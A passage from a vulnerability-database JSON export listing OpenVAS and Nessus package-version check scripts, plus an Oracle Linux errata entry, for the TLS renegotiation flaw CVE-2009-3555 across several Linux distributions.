\"ssh/login/rpms\");\n 
script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~9.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl097a-debuginfo\", rpm:\"openssl097a-debuginfo~0.9.7a~9.el5_4.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:18:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-927-1", "modified": "2017-12-01T00:00:00", "published": "2010-04-16T00:00:00", "id": "OPENVAS:840416", "href": "http://plugins.openvas.org/nasl.php?oid=840416", "type": "openvas", "title": "Ubuntu Update for nss vulnerability USN-927-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_927_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for nss vulnerability USN-927-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the 
hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds support for the new\n renegotiation extension and will use it when the server supports it.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-927-1\";\ntag_affected = \"nss vulnerability on Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-927-1/\");\n script_id(840416);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 17:02:11 +0200 (Fri, 16 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"927-1\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Ubuntu Update for nss vulnerability USN-927-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d-dbg\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-1d\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-dev\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-0d\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnss3-tools\", ver:\"3.12.6-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5062661 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-11-23T00:00:00", "id": "OPENVAS:136141256231066310", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066310", "type": "openvas", "title": "SLES9: Security update for OpenSSL", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5062661.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5062661 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66310\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES9: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.7d~15.41\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-18T10:57:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of mandriva-release", "modified": "2017-12-18T00:00:00", "published": "2010-02-19T00:00:00", "id": "OPENVAS:830893", "href": "http://plugins.openvas.org/nasl.php?oid=830893", "type": "openvas", "title": "Mandriva Update for mandriva-release MDVA-2010:069 (mandriva-release)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mandriva-release MDVA-2010:069 (mandriva-release)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The new mandriva-release packages adds extended maintenance access\n support.\n\n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"mandriva-release on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-02/msg00030.php\");\n script_id(830893);\n script_version(\"$Revision: 8153 $\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-18 07:30:39 +0100 (Mon, 18 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"MDVA\", value: \"2010:069\");\n script_name(\"Mandriva Update for mandriva-release MDVA-2010:069 (mandriva-release)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mandriva-release\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : 
tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-common\", rpm:\"mandriva-release-common~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-Flash\", rpm:\"mandriva-release-Flash~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-Free\", rpm:\"mandriva-release-Free~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-One\", rpm:\"mandriva-release-One~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release-Powerpack\", rpm:\"mandriva-release-Powerpack~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mandriva-release\", rpm:\"mandriva-release~2008.0~7.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-11-17T00:00:00", "id": "OPENVAS:66279", "href": "http://plugins.openvas.org/nasl.php?oid=66279", "type": "openvas", "title": "SLES10: Security update for OpenSSL", "sourceData": "#\n#VID slesp2-openssl-6654\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for OpenSSL\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n openssl\n openssl-devel\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(66279);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES10: Security update for OpenSSL\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8a~18.39.1\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8a~18.39.1\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8a~18.39.1\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, 
"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-927-5", "modified": "2017-12-22T00:00:00", "published": "2010-07-02T00:00:00", "id": "OPENVAS:1361412562310840453", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840453", "type": "openvas", "title": "Ubuntu Update for nspr update USN-927-5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_927_5.nasl 8228 2017-12-22 07:29:52Z teissa $\n#\n# Ubuntu Update for nspr update USN-927-5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-927-4 fixed vulnerabilities in NSS. This update provides the NSPR\n needed to use the new NSS.\n\n Original advisory details:\n \n Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. 
If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds support for the new\n new renegotiation extension and will use it when the server supports it.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-927-5\";\ntag_affected = \"nspr update on Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-927-5/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840453\");\n script_cve_id(\"CVE-2009-3555\");\n script_version(\"$Revision: 8228 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 08:29:52 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-02 14:26:21 +0200 (Fri, 02 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"927-5\");\n script_name(\"Ubuntu Update for nspr update USN-927-5\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = 
isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"4.8-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"4.8-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"4.8-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-19T15:05:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "description": "Check for the Version of nss", "modified": "2018-01-18T00:00:00", "published": "2010-03-31T00:00:00", "id": "OPENVAS:1361412562310861798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861798", "type": "openvas", "title": "Fedora Update for nss FEDORA-2010-3905", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss FEDORA-2010-3905\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss on Fedora 11\";\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to\n support cross-platform development of security-enabled client and\n server applications. Applications built with NSS can support SSL v2\n and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509\n v3 certificates, and other security standards.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037711.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861798\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-31 14:20:46 +0200 (Wed, 31 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-3905\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Fedora Update for nss FEDORA-2010-3905\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : 
tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.2.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "[0.9.7a-9.2]\n- CVE-2009-3555 - support the secure renegotiation RFC (#533125) ", "edition": 4, "modified": "2010-03-25T00:00:00", "published": "2010-03-25T00:00:00", "id": "ELSA-2010-0164", "href": "http://linux.oracle.com/errata/ELSA-2010-0164.html", "title": "openssl097a security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T14:04:21", "description": "This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.", "edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2011-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgnutls-extra26", "p-cpe:/a:novell:opensuse:libgnutls26", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:libgnutls26-32bit", "p-cpe:/a:novell:opensuse:gnutls", "p-cpe:/a:novell:opensuse:libgnutls-devel", "p-cpe:/a:novell:opensuse:libgnutls-extra-devel"], "id": "SUSE_11_1_GNUTLS-101206.NASL", "href": "https://www.tenable.com/plugins/nessus/53661", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3647.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53661);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)\");\n script_summary(english:\"Check for the gnutls-3647 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00051.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n 
